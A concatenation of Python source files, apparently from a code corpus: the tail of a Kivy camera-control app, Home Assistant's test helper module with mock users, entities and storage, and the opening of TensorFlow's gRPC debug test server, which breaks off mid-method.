self.root.ids.btnCam2Go3.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/11", [35, 50, 70])
client.send_message("/style/color/3/11", [50, 50, 0])
client.send_message("/style/bgcolor/5/3", [35, 50, 70])
client.send_message("/style/color/5/3", [50, 50, 0])
if cam2Pos4Run and not cam2AtPos4:
self.root.ids.btnCam2Go4.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/12", [35, 50, 70])
client.send_message("/style/color/3/12", [50, 50, 0])
client.send_message("/style/bgcolor/5/4", [35, 50, 70])
client.send_message("/style/color/5/4", [50, 50, 0])
if cam2Pos5Run and not cam2AtPos5:
self.root.ids.btnCam2Go5.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/13", [35, 50, 70])
client.send_message("/style/color/3/13", [50, 50, 0])
client.send_message("/style/bgcolor/5/5", [35, 50, 70])
client.send_message("/style/color/5/5", [50, 50, 0])
if cam2Pos6Run and not cam2AtPos6:
self.root.ids.btnCam2Go6.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/14", [35, 50, 70])
client.send_message("/style/color/3/14", [50, 50, 0])
client.send_message("/style/bgcolor/5/6", [35, 50, 70])
client.send_message("/style/color/5/6", [50, 50, 0])
if cam3Pos1Run and not cam3AtPos1:
self.root.ids.btnCam3Go1.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/17", [70, 62, 1])
client.send_message("/style/color/3/17", [50, 50, 0])
client.send_message("/style/bgcolor/6/1", [70, 62, 1])
client.send_message("/style/color/6/1", [50, 50, 0])
if cam3Pos2Run and not cam3AtPos2:
self.root.ids.btnCam3Go2.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/18", [70, 62, 1])
client.send_message("/style/color/3/18", [50, 50, 0])
client.send_message("/style/bgcolor/6/2", [70, 62, 1])
client.send_message("/style/color/6/2", [50, 50, 0])
if cam3Pos3Run and not cam3AtPos3:
self.root.ids.btnCam3Go3.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/19", [70, 62, 1])
client.send_message("/style/color/3/19", [50, 50, 0])
client.send_message("/style/bgcolor/6/3", [70, 62, 1])
client.send_message("/style/color/6/3", [50, 50, 0])
if cam3Pos4Run and not cam3AtPos4:
self.root.ids.btnCam3Go4.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/20", [70, 62, 1])
client.send_message("/style/color/3/20", [50, 50, 0])
client.send_message("/style/bgcolor/6/4", [70, 62, 1])
client.send_message("/style/color/6/4", [50, 50, 0])
if cam3Pos5Run and not cam3AtPos5:
self.root.ids.btnCam3Go5.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/21", [70, 62, 1])
client.send_message("/style/color/3/21", [50, 50, 0])
client.send_message("/style/bgcolor/6/5", [70, 62, 1])
client.send_message("/style/color/6/5", [50, 50, 0])
if cam3Pos6Run and not cam3AtPos6:
self.root.ids.btnCam3Go6.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/22", [70, 62, 1])
client.send_message("/style/color/3/22", [50, 50, 0])
client.send_message("/style/bgcolor/6/6", [70, 62, 1])
client.send_message("/style/color/6/6", [50, 50, 0])
def sendSerial(self, sendData):
if self.serial_port and self.serial_port.is_open:
if sys.version_info < (3, 0):
data = bytes(sendData + '\n')
else:
data = bytes((sendData + '\n'), 'utf8')
try:
self.serial_port.write(data)
#print(data)
except:
self.on_stop()
self.root.ids.txtInput_read.text += "[color=#FFFFFF]Port not connected.\n[/color]"
textLength = len(self.root.ids.txtInput_read.text)
if textLength > 8000:
self.root.ids.txtInput_read.text = self.root.ids.txtInput_read.text[1000:textLength]
self.root.ids.scroll_view.scroll_y = 0
else:
self.root.ids.txtInput_read.text += "[color=#FFFFFF]Port not connected.\n[/color]"
textLength = len(self.root.ids.txtInput_read.text)
if textLength > 8000:
self.root.ids.txtInput_read.text = self.root.ids.txtInput_read.text[1000:textLength]
self.root.ids.scroll_view.scroll_y = 0
if __name__ == '__main__':
PTSApp().run()
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import sys
import threading
import time
import uuid
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.yaml.loader as yaml_loader
from tests.async_mock import AsyncMock, Mock, patch
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone("US/Pacific")
hass.config.units = METRIC_SYSTEM
hass.config.media_dirs = {"local": get_test_config_dir("media")}
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
async def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = Message(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, datetime_, fire_all=False):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
mock_seconds_into_future = datetime_.timestamp() - time.time()
future_seconds = task.when() - hass.loop.time()
if fire_all or mock_seconds_into_future >= future_seconds:
with patch(
"homeassistant.helpers.event.pattern_utc_now",
return_value=date_util.as_utc(datetime_),
):
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
@ha.callback
def async_fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.async_fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
registry._rebuild_index()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
registry._rebuild_index()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
system_options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN,
unique_id=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid.uuid4().hex,
"domain": domain,
"data": data or {},
"system_options": system_options,
"options": options,
"version": version,
"title": title,
"connection_class": connection_class,
"unique_id": unique_id,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"]["info"][domain](hass)
def mock_integration(hass, module):
"""Mock an integration."""
integration = loader.Integration(
hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest()
)
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
|
grpc_debug_test_server.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""GRPC debug server for testing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import errno
import functools
import hashlib
import json
import os
import re
import shutil
import tempfile
import threading
import time
import portpicker
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.debug.lib import grpc_debug_server
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.ops import variables
def _get_dump_file_path(dump_root, device_name, debug_node_name):
"""Get the file path of the dump file for a debug node.
Args:
dump_root: (str) Root dump directory.
device_name: (str) Name of the device that the debug node resides on.
debug_node_name: (str) Name of the debug node, e.g.,
cross_entropy/Log:0:DebugIdentity.
Returns:
(str) Full path of the dump file.
"""
dump_root = os.path.join(
dump_root, debug_data.device_name_to_device_path(device_name))
if "/" in debug_node_name:
dump_dir = os.path.join(dump_root, os.path.dirname(debug_node_name))
dump_file_name = re.sub(":", "_", os.path.basename(debug_node_name))
else:
dump_dir = dump_root
dump_file_name = re.sub(":", "_", debug_node_name)
now_microsec = int(round(time.time() * 1000 * 1000))
dump_file_name += "_%d" % now_microsec
return os.path.join(dump_dir, dump_file_name)
class EventListenerTestStreamHandler(
grpc_debug_server.EventListenerBaseStreamHandler):
"""Implementation of EventListenerBaseStreamHandler that dumps to file."""
def __init__(self, dump_dir, event_listener_servicer):
super(EventListenerTestStreamHandler, self).__init__()
self._dump_dir = dump_dir
self._event_listener_servicer = event_listener_servicer
if self._dump_dir:
self._try_makedirs(self._dump_dir)
self._grpc_path = None
self._cached_graph_defs = []
self._cached_graph_def_device_names = []
self._cached_graph_def_wall_times = []
def on_core_metadata_event(self, event):
core_metadata = json.loads(event.log_message.message)
if not self._grpc_path:
